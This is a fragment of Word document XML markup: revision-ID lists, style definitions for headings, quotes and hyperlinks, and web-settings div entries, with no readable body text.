    <w:rsid w:val="0072035A"/>
    <w:rsid w:val="00723AB1"/>
    <w:rsid w:val="007255CC"/>
    <w:rsid w:val="00726FC1"/>
    <w:rsid w:val="00730659"/>
    <w:rsid w:val="0074350B"/>
    <w:rsid w:val="00752E0F"/>
    <w:rsid w:val="007676FF"/>
    <w:rsid w:val="0077103E"/>
    <w:rsid w:val="00772D97"/>
    <w:rsid w:val="00786159"/>
    <w:rsid w:val="007B0372"/>
    <w:rsid w:val="007B255B"/>
    <w:rsid w:val="007B4EEE"/>
    <w:rsid w:val="007C290D"/>
    <w:rsid w:val="007D60FA"/>
    <w:rsid w:val="007E7A84"/>
    <w:rsid w:val="007F4170"/>
    <w:rsid w:val="00800C80"/>
    <w:rsid w:val="0080350A"/>
    <w:rsid w:val="00804B18"/>
    <w:rsid w:val="00806014"/>
    <w:rsid w:val="00810F6C"/>
    <w:rsid w:val="008110CE"/>
    <w:rsid w:val="00813496"/>
    <w:rsid w:val="00813D0D"/>
    <w:rsid w:val="008154F1"/>
    <w:rsid w:val="00817295"/>
    <w:rsid w:val="00847C8A"/>
    <w:rsid w:val="00873EBB"/>
    <w:rsid w:val="00882BF3"/>
    <w:rsid w:val="00883A17"/>
    <w:rsid w:val="0088672A"/>
    <w:rsid w:val="00892789"/>
    <w:rsid w:val="0089352E"/>
    <w:rsid w:val="00897B79"/>
    <w:rsid w:val="008A0F76"/>
    <w:rsid w:val="008A3638"/>
    <w:rsid w:val="008A5775"/>
    <w:rsid w:val="008A6D1E"/>
    <w:rsid w:val="008A7727"/>
    <w:rsid w:val="008C066C"/>
    <w:rsid w:val="008C1582"/>
    <w:rsid w:val="008C3FDF"/>
    <w:rsid w:val="008D1514"/>
    <w:rsid w:val="008D2D4C"/>
    <w:rsid w:val="008D2F34"/>
    <w:rsid w:val="008D404F"/>
    <w:rsid w:val="008E373A"/>
    <w:rsid w:val="008E3BEF"/>
    <w:rsid w:val="008E6B86"/>
    <w:rsid w:val="008E7552"/>
    <w:rsid w:val="008F37CD"/>
    <w:rsid w:val="009163B0"/>
    <w:rsid w:val="00920AE9"/>
    <w:rsid w:val="009270C0"/>
    <w:rsid w:val="00930780"/>
    <w:rsid w:val="00930AF1"/>
    <w:rsid w:val="00933DDE"/>
    <w:rsid w:val="009364DF"/>
    <w:rsid w:val="00940D3C"/>
    <w:rsid w:val="0094127D"/>
    <w:rsid w:val="00943D30"/>
    <w:rsid w:val="00950D1D"/>
    <w:rsid w:val="00952985"/>
    <w:rsid w:val="0096541F"/>
    <w:rsid w:val="009775E5"/>
    <w:rsid w:val="00980E0E"/>
    <w:rsid w:val="00980E58"/>
    <w:rsid w:val="0098268D"/>
    <w:rsid w:val="00987E1B"/>
    <w:rsid w:val="009A1845"/>
    <w:rsid w:val="009A296D"/>
    <w:rsid w:val="009A2FE7"/>
    <w:rsid w:val="009B1FA0"/>
    <w:rsid w:val="009C77E4"/>
    <w:rsid w:val="009D0E12"/>
    <w:rsid w:val="009D25B0"/>
    <w:rsid w:val="009D4D4B"/>
    <w:rsid w:val="009E0CBD"/>
    <w:rsid w:val="009E3A59"/>
    <w:rsid w:val="009E75D5"/>
    <w:rsid w:val="009F3651"/>
    <w:rsid w:val="00A01C63"/>
    <w:rsid w:val="00A16267"/>
    <w:rsid w:val="00A16B3E"/>
    <w:rsid w:val="00A25701"/>
    <w:rsid w:val="00A25F69"/>
    <w:rsid w:val="00A27EB3"/>
    <w:rsid w:val="00A30CDC"/>
    <w:rsid w:val="00A36FBE"/>
    <w:rsid w:val="00A37D8C"/>
    <w:rsid w:val="00A42FA5"/>
    <w:rsid w:val="00A47F17"/>
    <w:rsid w:val="00A503FD"/>
    <w:rsid w:val="00A625A1"/>
    <w:rsid w:val="00A664C2"/>
    <w:rsid w:val="00A716BA"/>
    <w:rsid w:val="00A71BB3"/>
    <w:rsid w:val="00A74E5E"/>
    <w:rsid w:val="00A80D19"/>
    <w:rsid w:val="00AA1546"/>
    <w:rsid w:val="00AA413F"/>
    <w:rsid w:val="00AB08CB"/>
    <w:rsid w:val="00AC0D7D"/>
    <w:rsid w:val="00AC2D8D"/>
    <w:rsid w:val="00AC4B75"/>
    <w:rsid w:val="00AD3C26"/>
    <w:rsid w:val="00AD5A99"/>
    <w:rsid w:val="00AD7813"/>
    <w:rsid w:val="00AE7481"/>
    <w:rsid w:val="00B01DEA"/>
    <w:rsid w:val="00B02F1C"/>
    <w:rsid w:val="00B0335A"/>
    <w:rsid w:val="00B102B3"/>
    <w:rsid w:val="00B106EC"/>
    <w:rsid w:val="00B1107D"/>
    <w:rsid w:val="00B150B7"/>
    <w:rsid w:val="00B215E0"/>
    <w:rsid w:val="00B268F8"/>
    <w:rsid w:val="00B30837"/>
    <w:rsid w:val="00B30D0C"/>
    <w:rsid w:val="00B30F5D"/>
    <w:rsid w:val="00B31BEF"/>
    <w:rsid w:val="00B369D0"/>
    <w:rsid w:val="00B4458F"/>
    <w:rsid w:val="00B53A54"/>
    <w:rsid w:val="00B634A3"/>
    <w:rsid w:val="00B64404"/>
    <w:rsid w:val="00B75E87"/>
    <w:rsid w:val="00B7689F"/>
    <w:rsid w:val="00B77A37"/>
    <w:rsid w:val="00B839D5"/>
    <w:rsid w:val="00B87F1F"/>
    <w:rsid w:val="00B95301"/>
    <w:rsid w:val="00B97BF5"/>
    <w:rsid w:val="00BB17D9"/>
    <w:rsid w:val="00BC0DD1"/>
    <w:rsid w:val="00BD11C3"/>
    <w:rsid w:val="00BD1A97"/>
    <w:rsid w:val="00BD4340"/>
    <w:rsid w:val="00BF7833"/>
    <w:rsid w:val="00C00D12"/>
    <w:rsid w:val="00C1032A"/>
    <w:rsid w:val="00C11F4F"/>
    <w:rsid w:val="00C15324"/>
    <w:rsid w:val="00C23D7B"/>
    <w:rsid w:val="00C30858"/>
    <w:rsid w:val="00C331AC"/>
    <w:rsid w:val="00C37C9A"/>
    <w:rsid w:val="00C4394F"/>
    <w:rsid w:val="00C44632"/>
    <w:rsid w:val="00C4612C"/>
    <w:rsid w:val="00C567D6"/>
    <w:rsid w:val="00C62672"/>
    <w:rsid w:val="00C8563B"/>
    <w:rsid w:val="00C874E8"/>
    <w:rsid w:val="00C95C68"/>
    <w:rsid w:val="00C97ECA"/>
    <w:rsid w:val="00CA2A19"/>
    <w:rsid w:val="00CC2CFA"/>
    <w:rsid w:val="00CC4C4B"/>
    <w:rsid w:val="00CC6C94"/>
    <w:rsid w:val="00CC796D"/>
    <w:rsid w:val="00CD1987"/>
    <w:rsid w:val="00CD1EAB"/>
    <w:rsid w:val="00CD2538"/>
    <w:rsid w:val="00CD32C1"/>
    <w:rsid w:val="00CE32EB"/>
    <w:rsid w:val="00CE3331"/>
    <w:rsid w:val="00CF33F1"/>
    <w:rsid w:val="00CF3565"/>
    <w:rsid w:val="00CF6334"/>
    <w:rsid w:val="00CF6E4C"/>
    <w:rsid w:val="00D00FB0"/>
    <w:rsid w:val="00D14135"/>
    <w:rsid w:val="00D15AE0"/>
    <w:rsid w:val="00D232DD"/>
    <w:rsid w:val="00D27AC8"/>
    <w:rsid w:val="00D360F5"/>
    <w:rsid w:val="00D372E2"/>
    <w:rsid w:val="00D37B8F"/>
    <w:rsid w:val="00D521CF"/>
    <w:rsid w:val="00D5584C"/>
    <w:rsid w:val="00D80B1B"/>
    <w:rsid w:val="00D80EF2"/>
    <w:rsid w:val="00D841C6"/>
    <w:rsid w:val="00D8498F"/>
    <w:rsid w:val="00D85A07"/>
    <w:rsid w:val="00D87A16"/>
    <w:rsid w:val="00D924ED"/>
    <w:rsid w:val="00DB41C9"/>
    <w:rsid w:val="00DD7DC9"/>
    <w:rsid w:val="00DE0241"/>
    <w:rsid w:val="00DE253C"/>
    <w:rsid w:val="00E0359F"/>
    <w:rsid w:val="00E12743"/>
    <w:rsid w:val="00E17DBC"/>
    <w:rsid w:val="00E204D2"/>
    <w:rsid w:val="00E254BD"/>
    <w:rsid w:val="00E33098"/>
    <w:rsid w:val="00E34555"/>
    <w:rsid w:val="00E41A27"/>
    <w:rsid w:val="00E42462"/>
    <w:rsid w:val="00E45354"/>
    <w:rsid w:val="00E52D0A"/>
    <w:rsid w:val="00E7040D"/>
    <w:rsid w:val="00E706C9"/>
    <w:rsid w:val="00E80AD1"/>
    <w:rsid w:val="00E90810"/>
    <w:rsid w:val="00E957E7"/>
    <w:rsid w:val="00E96AF9"/>
    <w:rsid w:val="00EA275D"/>
    <w:rsid w:val="00EA6EB0"/>
    <w:rsid w:val="00EB2E07"/>
    <w:rsid w:val="00EC2FA6"/>
    <w:rsid w:val="00ED035E"/>
    <w:rsid w:val="00ED15CF"/>
    <w:rsid w:val="00ED1CCC"/>
    <w:rsid w:val="00EE1783"/>
    <w:rsid w:val="00EE2976"/>
    <w:rsid w:val="00EF3DD2"/>
    <w:rsid w:val="00EF488F"/>
    <w:rsid w:val="00EF4C60"/>
    <w:rsid w:val="00F06909"/>
    <w:rsid w:val="00F21800"/>
    <w:rsid w:val="00F32E78"/>
    <w:rsid w:val="00F344AA"/>
    <w:rsid w:val="00F35639"/>
    <w:rsid w:val="00F36876"/>
    <w:rsid w:val="00F50DB7"/>
    <w:rsid w:val="00F613E9"/>
    <w:rsid w:val="00F806EA"/>
    <w:rsid w:val="00F833E7"/>
    <w:rsid w:val="00F83721"/>
    <w:rsid w:val="00F948A1"/>
    <w:rsid w:val="00F954CE"/>
    <w:rsid w:val="00FA06B9"/>
    <w:rsid w:val="00FA63E9"/>
    <w:rsid w:val="00FA6911"/>
    <w:rsid w:val="00FC1610"/>
    <w:rsid w:val="00FC205C"/>
    <w:rsid w:val="00FD3637"/>
    <w:rsid w:val="00FD41BF"/>
    <w:rsid w:val="00FE275B"/>
    <w:rsid w:val="00FF3DB4"/>
    <w:rsid w:val="00FF42A0"/>
    <w:rsid w:val="00FF6A8D"/>
    <w:rsid w:val="00FF72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0C8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD0F4000-9F40-429C-9BC2-BB7BE132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3C"/>
    <w:pPr>
      <w:bidi/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00346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7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7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7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7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7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7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7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7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7DE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00346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7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7DE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00346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7DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003725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5183">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="66155687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="84351935">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="113333150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="225773250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="255334294">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="298725559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="323627271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="342245319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="430781077">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="436802452">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="446391954">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="509413221">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="633870619">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="921795728">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="962350198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="978268902">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1123891222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1249465896">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1307204444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1323658101">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1382747297">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1401176623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1426414117">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1454519065">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1472863769">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1481920777">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1493372993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1542010383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1548449301">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
